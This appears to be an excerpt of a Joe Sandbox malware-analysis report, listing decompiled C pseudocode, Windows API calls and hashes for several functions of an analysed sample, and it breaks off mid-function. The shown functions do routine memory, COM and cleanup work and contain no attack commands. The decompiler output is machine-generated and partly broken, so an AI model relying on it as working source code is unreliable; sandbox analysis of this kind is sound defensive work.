                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
                                                                              • String ID:
                                                                              • API String ID: 1487844433-0
                                                                              • Opcode ID: c49a3505c5db225755bb3125becdb6cce9c646128e876951c891abf90fb330a4
                                                                              • Instruction ID: 9dae019a1d6f26c51402996a51035ce9e85c34501d1d41308d0e853f0881105a
                                                                              • Opcode Fuzzy Hash: c49a3505c5db225755bb3125becdb6cce9c646128e876951c891abf90fb330a4
                                                                              • Instruction Fuzzy Hash: 43F0F6316017119FD7302F60BC0DA873BA4EB047A3B100A79F952E62A1DBB8D84087EC
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042E132, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042E132(long* __ecx) {
				long _t4;
				long _t5;
				void* _t6;
				void* _t13;
				long _t14;
				long* _t15;

				_t15 = __ecx;
				_t1 =  &(_t15[5]); // 0x615028
				_t4 =  *_t1;
				if(_t4 != 0) {
					do {
						_t14 =  *(_t4 + 4);
						E0042DF9A(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t3 =  &(_t15[4]); // 0x5e00a8
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                                                                              0x0042e133
                                                                              0x0042e135
                                                                              0x0042e135
                                                                              0x0042e13b
                                                                              0x0042e13d
                                                                              0x0042e13d
                                                                              0x0042e145
                                                                              0x0042e14c
                                                                              0x0042e14c
                                                                              0x0042e13d
                                                                              0x0042e150
                                                                              0x0042e155
                                                                              0x0042e158
                                                                              0x0042e158
                                                                              0x0042e15e
                                                                              0x0042e15e
                                                                              0x0042e163
                                                                              0x0042e16c
                                                                              0x0042e16f
                                                                              0x0042e176
                                                                              0x0042e176
                                                                              0x0042e180
                                                                              0x0042e188

                                                                              APIs
                                                                              • TlsFree.KERNEL32(00615028,?,?,0042E1A9,00000000,00000001), ref: 0042E158
                                                                              • GlobalHandle.KERNEL32(005E00A8), ref: 0042E166
                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,0042E1A9,00000000,00000001), ref: 0042E16F
                                                                              • GlobalFree.KERNEL32 ref: 0042E176
                                                                              • DeleteCriticalSection.KERNEL32(0045A0BC,?,?,0042E1A9,00000000,00000001), ref: 0042E180
                                                                                • Part of subcall function 0042DF9A: EnterCriticalSection.KERNEL32(?), ref: 0042DFF7
                                                                                • Part of subcall function 0042DF9A: LeaveCriticalSection.KERNEL32(?,?), ref: 0042E007
                                                                                • Part of subcall function 0042DF9A: LocalFree.KERNEL32(?), ref: 0042E010
                                                                                • Part of subcall function 0042DF9A: TlsSetValue.KERNEL32(?,00000000), ref: 0042E022
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                              • String ID:
                                                                              • API String ID: 1549993015-0
                                                                              • Opcode ID: a880416ccc740a60decd58c0d2ac5b52bd6ff4a99c811f2b5f2dffebbd3a1150
                                                                              • Instruction ID: d7330e3687ae5cd428cb32ec7f4b1f62cbc295cce9f61219142c3d003bfa858e
                                                                              • Opcode Fuzzy Hash: a880416ccc740a60decd58c0d2ac5b52bd6ff4a99c811f2b5f2dffebbd3a1150
                                                                              • Instruction Fuzzy Hash: 16F0E2313002209BC621AB39BE08A7B77BDAF897207560529F915C33A0CBB8DC02876C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040F4FE, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E0040F4FE(intOrPtr* __ecx) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E004128A0(E004311C2, _t263);
				_t130 =  *0x457184; // 0xb7aa1229
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x44ddbc);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E0040C567(_t263 - 0x70, 0x44e4d8);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E0040C567(_t263 - 0x40, 0x44e4c0);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x44dfbc, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x44df9c);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x44e0dc);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E00424440(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E0040E418(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E0040C7E4(_t229, _t172 + 4);
						}
						if(E00424440(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E0040B21D(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E0040EF2E(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E00412140(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E0040EE18( *((intOrPtr*)(_t261 + 0x50)));
						E0040C7A1( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E00424440(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E0042319C(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E00409D70(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E004230D7( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E00412FBB(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}




































                                                                              0x0040f503
                                                                              0x0040f50e
                                                                              0x0040f515
                                                                              0x0040f517
                                                                              0x0040f51e
                                                                              0x0040f52c
                                                                              0x0040f52f
                                                                              0x0040f65c
                                                                              0x0040f661
                                                                              0x0040f66f
                                                                              0x0040f673
                                                                              0x0040f674
                                                                              0x0040f679
                                                                              0x0040f67f
                                                                              0x0040f690
                                                                              0x0040f695
                                                                              0x0040f6a4
                                                                              0x0040f6a7
                                                                              0x0040f6aa
                                                                              0x0040f6b1
                                                                              0x0040f6b4
                                                                              0x0040f6bb
                                                                              0x0040f6c0
                                                                              0x0040f6c3
                                                                              0x0040f6d0
                                                                              0x0040f6d7
                                                                              0x0040f6da
                                                                              0x0040f6e1
                                                                              0x0040f6e4
                                                                              0x0040f6f1
                                                                              0x0040f6f5
                                                                              0x0040f714
                                                                              0x0040f71a
                                                                              0x0040f720
                                                                              0x0040f72a
                                                                              0x0040f730
                                                                              0x0040f736
                                                                              0x0040f73f
                                                                              0x0040f744
                                                                              0x0040f74a
                                                                              0x0040f766
                                                                              0x0040f769
                                                                              0x0040f76f
                                                                              0x0040f772
                                                                              0x0040f775
                                                                              0x0040f778
                                                                              0x0040f77e
                                                                              0x00000000
                                                                              0x0040f74c
                                                                              0x0040f74c
                                                                              0x0040f752
                                                                              0x0040f752
                                                                              0x00000000
                                                                              0x0040f6f7
                                                                              0x0040f6f7
                                                                              0x0040f6fd
                                                                              0x0040f700
                                                                              0x0040f700
                                                                              0x0040f6f5
                                                                              0x0040f663
                                                                              0x0040f663
                                                                              0x0040f663
                                                                              0x0040f535
                                                                              0x0040f535
                                                                              0x0040f544
                                                                              0x0040f549
                                                                              0x0040f54f
                                                                              0x0040f555
                                                                              0x0040f55d
                                                                              0x0040f55e
                                                                              0x0040f563
                                                                              0x0040f568
                                                                              0x0040f56a
                                                                              0x0040f570
                                                                              0x0040f571
                                                                              0x0040f576
                                                                              0x0040f57b
                                                                              0x0040f581
                                                                              0x0040f583
                                                                              0x0040f597
                                                                              0x0040f59a
                                                                              0x0040f5a0
                                                                              0x0040f5a0
                                                                              0x0040f5a3
                                                                              0x0040f5a9
                                                                              0x0040f5a9
                                                                              0x0040f5b6
                                                                              0x0040f5c4
                                                                              0x0040f5b8
                                                                              0x0040f5bd
                                                                              0x0040f5bd
                                                                              0x0040f5c6
                                                                              0x0040f5c9
                                                                              0x0040f5cf
                                                                              0x0040f5d2
                                                                              0x0040f5d5
                                                                              0x0040f5d9
                                                                              0x0040f5e0
                                                                              0x0040f5e0
                                                                              0x0040f5ef
                                                                              0x0040f600
                                                                              0x0040f5f1
                                                                              0x0040f5f9
                                                                              0x0040f5f9
                                                                              0x0040f605
                                                                              0x0040f60c
                                                                              0x0040f617
                                                                              0x0040f61d
                                                                              0x0040f620
                                                                              0x0040f626
                                                                              0x0040f62a
                                                                              0x0040f63c
                                                                              0x0040f63f
                                                                              0x0040f64a
                                                                              0x0040f652
                                                                              0x0040f781
                                                                              0x0040f784
                                                                              0x0040f787
                                                                              0x0040f789
                                                                              0x0040f78b
                                                                              0x0040f78d
                                                                              0x0040f793
                                                                              0x0040f798
                                                                              0x0040f79b
                                                                              0x0040f7a8
                                                                              0x0040f79d
                                                                              0x0040f7a1
                                                                              0x0040f7a1
                                                                              0x0040f7aa
                                                                              0x0040f7b1
                                                                              0x0040f7b4
                                                                              0x0040f7bb
                                                                              0x0040f7be
                                                                              0x0040f78b
                                                                              0x0040f7c3
                                                                              0x0040f7cb
                                                                              0x0040f7d0
                                                                              0x0040f7d7
                                                                              0x0040f7d8
                                                                              0x0040f7e1
                                                                              0x0040f7e4
                                                                              0x0040f7ec
                                                                              0x0040f7ee
                                                                              0x0040f7f3
                                                                              0x0040f7f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040f7fd
                                                                              0x0040f80a
                                                                              0x0040f818
                                                                              0x0040f81e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040f7fa
                                                                              0x0040f820
                                                                              0x0040f822
                                                                              0x0040f827
                                                                              0x0040f82b
                                                                              0x0040f831
                                                                              0x0040f831
                                                                              0x0040f834
                                                                              0x0040f837
                                                                              0x0040f837
                                                                              0x0040f83a
                                                                              0x00000000
                                                                              0x0040f7e9
                                                                              0x00000000
                                                                              0x0040f83a
                                                                              0x0040f7ec
                                                                              0x0040f83c
                                                                              0x0040f842
                                                                              0x0040f842
                                                                              0x0040f848
                                                                              0x0040f848
                                                                              0x0040f848
                                                                              0x0040f54f
                                                                              0x0040f853
                                                                              0x0040f864

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040F503
                                                                              • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 0040F62A
                                                                              • CoTaskMemFree.OLE32(?,?,00000000), ref: 0040F842
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Task$AllocFreeH_prolog
                                                                              • String ID:
                                                                              • API String ID: 1522537378-3916222277
                                                                              • Opcode ID: aa5b8d3ee7528c7365d01c3f65cbf4f394906ad53a11e007f37402f9cc77751e
                                                                              • Instruction ID: e283423e67acad890aa5bd1119533e628477d43c1b64eccf915fd59176b95e8f
                                                                              • Opcode Fuzzy Hash: aa5b8d3ee7528c7365d01c3f65cbf4f394906ad53a11e007f37402f9cc77751e
                                                                              • Instruction Fuzzy Hash: 98C10970A00604DFDB24DFA9C884AAEB7F5BF88708F20457EE406E7691DB79A945CF14
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040CAA4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E0040CAA4(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E004128A0(E0043112B, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x44debc);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E0041162C(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x44ac98)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x44ac9c);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x44df0c);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}











                                                                              0x0040caa9
                                                                              0x0040cab6
                                                                              0x0040cab8
                                                                              0x0040cabb
                                                                              0x0040cabe
                                                                              0x0040cac3
                                                                              0x0040cac8
                                                                              0x0040cac9
                                                                              0x0040cad0
                                                                              0x0040cadc
                                                                              0x0040cae5
                                                                              0x0040caee
                                                                              0x0040caf6
                                                                              0x0040cafd
                                                                              0x0040cb00
                                                                              0x0040cb03
                                                                              0x0040cb06
                                                                              0x0040cb09
                                                                              0x0040cb11
                                                                              0x0040cb14
                                                                              0x0040cb17
                                                                              0x0040cb1a
                                                                              0x0040cb1d
                                                                              0x0040cb2f
                                                                              0x0040cb39
                                                                              0x0040cb44
                                                                              0x0040cb44
                                                                              0x0040cb47
                                                                              0x0040cb4b
                                                                              0x0040cb5f
                                                                              0x0040cb71
                                                                              0x0040cb79
                                                                              0x0040cb8b
                                                                              0x0040cb93
                                                                              0x0040cba6
                                                                              0x0040cbae
                                                                              0x0040cbc0
                                                                              0x0040cbc8
                                                                              0x0040cbce
                                                                              0x0040cbd6
                                                                              0x0040cbd7
                                                                              0x0040cbdc
                                                                              0x0040cbe2
                                                                              0x0040cbe4
                                                                              0x0040cbe4
                                                                              0x0040cbe7
                                                                              0x0040cbed
                                                                              0x0040cbf1
                                                                              0x0040cbf2
                                                                              0x0040cbfb
                                                                              0x0040cc01
                                                                              0x0040cc06
                                                                              0x0040cc0c
                                                                              0x0040cc12
                                                                              0x0040cc15
                                                                              0x0040cc15
                                                                              0x0040cc1c
                                                                              0x0040cc22
                                                                              0x0040cc25
                                                                              0x0040cc2a
                                                                              0x0040cc2f
                                                                              0x0040cc2f
                                                                              0x0040cc36
                                                                              0x0040cc36
                                                                              0x0040cc44
                                                                              0x0040cc4c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearH_prologVariant
                                                                              • String ID: @$@
                                                                              • API String ID: 1166855276-149943524
                                                                              • Opcode ID: d7a6b9cd2f239eb04d16a9397a3c4d23724b72bb5a0530ab5ecbfc62ed6d2f15
                                                                              • Instruction ID: 6fc71d41aac9ba4043267bb30301733352689564136a8006ddb90503d104dfff
                                                                              • Opcode Fuzzy Hash: d7a6b9cd2f239eb04d16a9397a3c4d23724b72bb5a0530ab5ecbfc62ed6d2f15
                                                                              • Instruction Fuzzy Hash: 3E51B5B1A002199FDB04CFA9C8849EEBBF9FF48304F14456EE506EB250E774A945CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407453, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E00407453() {
				void* _t35;
				void* _t39;
				void* _t41;
				intOrPtr* _t44;
				void* _t45;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t85;
				void* _t90;

				E004128A0(E00430B1A, _t90);
				E004063E4(E0040669E(0x458420));
				_t64 = E0040669E(0x458420);
				_t35 = E004062E3(_t34);
				if(_t35 == 0) {
					_t85 = __imp__#9;
					do {
						 *((short*)(_t90 - 0x28)) = 8;
						 *((intOrPtr*)(_t90 - 0x20)) = E0041FCB0(_t64, "FirstName");
						 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
						_t39 = E00406A15(E0040669E(0x458420), _t90 - 0x18);
						 *(_t90 - 4) = 1;
						_t41 = E004069CF(E0040669E(_t39), _t90 - 0x14, _t90 - 0x28);
						 *(_t90 - 4) = 2;
						_push(E0040626B(E0040669E(_t41), _t90 - 0x38));
						 *(_t90 - 4) = 3;
						_t44 = E00407269(_t90 - 0x10);
						_t76 =  *_t44;
						 *(_t90 - 4) = 4;
						if( *_t44 == 0) {
							_t45 = 0;
						} else {
							_t45 = E004060FD(_t76);
						}
						E00406644( *((intOrPtr*)(_t90 + 8)), _t45);
						_t78 =  *(_t90 - 0x10);
						if( *(_t90 - 0x10) != 0) {
							E004069A2(_t78);
							 *(_t90 - 0x10) =  *(_t90 - 0x10) & 0x00000000;
						}
						_push(_t90 - 0x38);
						 *(_t90 - 4) = 2;
						if( *_t85() < 0) {
							E0041FC30(_t48);
						}
						_t49 =  *((intOrPtr*)(_t90 - 0x14));
						 *(_t90 - 4) = 1;
						if(_t49 != 0) {
							 *((intOrPtr*)( *_t49 + 8))(_t49);
						}
						_t50 =  *((intOrPtr*)(_t90 - 0x18));
						 *(_t90 - 4) = 0;
						if(_t50 != 0) {
							 *((intOrPtr*)( *_t50 + 8))(_t50);
						}
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						_push(_t90 - 0x28);
						if( *_t85() < 0) {
							E0041FC30(_t52);
						}
						E0040639C(E0040669E(0x458420));
						_t64 = E0040669E(0x458420);
						_t35 = E004062E3(_t55);
